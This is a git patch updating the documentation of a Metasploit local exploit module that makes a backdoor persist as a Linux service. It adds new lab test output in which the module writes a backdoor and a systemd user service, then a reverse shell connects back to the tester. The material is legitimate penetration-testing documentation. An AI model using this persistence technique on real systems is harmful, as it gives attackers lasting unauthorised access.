From a6782cbee4b319699bece7517c2a8a191a5a0e26 Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 6 Mar 2019 00:47:12 -0600 Subject: [PATCH] Update module doc with my testing notes --- .../linux/local/service_persistence.md | 58 ++++++++----------- 1 file changed, 23 insertions(+), 35 deletions(-) diff --git a/documentation/modules/exploit/linux/local/service_persistence.md b/documentation/modules/exploit/linux/local/service_persistence.md index 7e22032d77..782262296d 100644 --- a/documentation/modules/exploit/linux/local/service_persistence.md +++ b/documentation/modules/exploit/linux/local/service_persistence.md @@ -5,9 +5,10 @@ 1. Kali 2.0 (System V) 2. Ubuntu 14.04 (Upstart) 3. Ubuntu 16.04 (systemd) -4. Centos 5 (System V) -5. Fedora 18 (systemd) -6. Fedora 20 (systemd) +4. Ubuntu 16.04 (systemd user) +5. Centos 5 (System V) +6. Fedora 18 (systemd) +7. Fedora 20 (systemd) ## Verification Steps @@ -253,16 +254,16 @@ Now with a multi handler, we can catch systemd restarting the process every 10se [*] Starting the payload handler... [*] Command shell session 8 opened (192.168.199.128:4444 -> 192.168.199.130:47056) at 2016-06-22 10:37:30 -0400 -### systemd user +### systemd (Ubuntu 16.04 Server - vagrant) - msf5 exploit(linux/local/service_persistence) > show options + msf5 exploit(linux/local/service_persistence) > options Module options (exploit/linux/local/service_persistence): Name Current Setting Required Description ---- --------------- -------- ----------- SERVICE no Name of service to create - SESSION 1 yes The session to run this module on. + SESSION -1 yes The session to run this module on. SHELLPATH /tmp yes Writable path to put our shell SHELL_NAME no Name of shell file to write @@ -271,8 +272,8 @@ Now with a multi handler, we can catch systemd restarting the process every 10se Name Current Setting Required Description ---- --------------- -------- ----------- - LHOST 127.0.0.1 yes The listen address (an interface may be specified) - LPORT 4445 yes The listen port + LHOST 172.28.128.1 yes The listen address (an interface may be specified) + LPORT 4444 yes The listen port Exploit target: @@ -285,33 +286,20 @@ Now with a multi handler, we can catch systemd restarting the process every 10se msf5 exploit(linux/local/service_persistence) > run [!] SESSION may not be compatible with this module. - [!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want - ReverseListenerBindAddress? - [*] Started reverse TCP handler on 127.0.0.1:4445 - [*] Command shell session 2 opened (127.0.0.1:4445 -> 127.0.0.1:54344) at 2019-02-15 1 - 5:45:16 -0500 - - id - uid=1000(cblack) gid=1000(cblack) groups=1000(cblack),27(sudo),117(postgres) - exit - [*] 127.0.0.1 - Command shell session 2 closed. - msf5 exploit(linux/local/service_persistence) > set VERBOSE true - VERBOSE => true - msf5 exploit(linux/local/service_persistence) > run - - [!] SESSION may not be compatible with this module. - [!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want - ReverseListenerBindAddress? - [*] Started reverse TCP handler on 127.0.0.1:4445 - [*] Writing backdoor to /tmp/iEucd - [*] Writing service: /home/cblack/.config/systemd/user/uKxHqmV.service + [*] Started reverse TCP handler on 172.28.128.1:4444 + [*] Writing backdoor to /tmp/PPpCF + [*] Max line length is 65537 + [*] Writing 94 bytes in 1 chunks of 330 bytes (octal-encoded), using printf + [*] Creating user service directory + [*] Writing service: /home/vagrant/.config/systemd/user/OzzdRBC.service + [*] Max line length is 65537 + [*] Writing 203 bytes in 1 chunks of 778 bytes (octal-encoded), using printf [*] Reloading manager configuration [*] Enabling service - [*] Starting service: uKxHqmV - [*] Command shell session 3 opened (127.0.0.1:4445 -> 127.0.0.1:54358) at 2019-02-15 1 - 5:45:30 -0500 + [*] Starting service: OzzdRBC + [*] Command shell session 2 opened (172.28.128.1:4444 -> 172.28.128.3:52564) at 2019-03-06 00:22:40 -0600 - echo hi lennart - hi lennart - exit - [*] 127.0.0.1 - Command shell session 3 closed. + id + uid=1000(vagrant) gid=1000(vagrant) groups=1000(vagrant) + uname -a + Linux ubuntu-xenial 4.4.0-141-generic #167-Ubuntu SMP Wed Dec 5 10:40:15 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux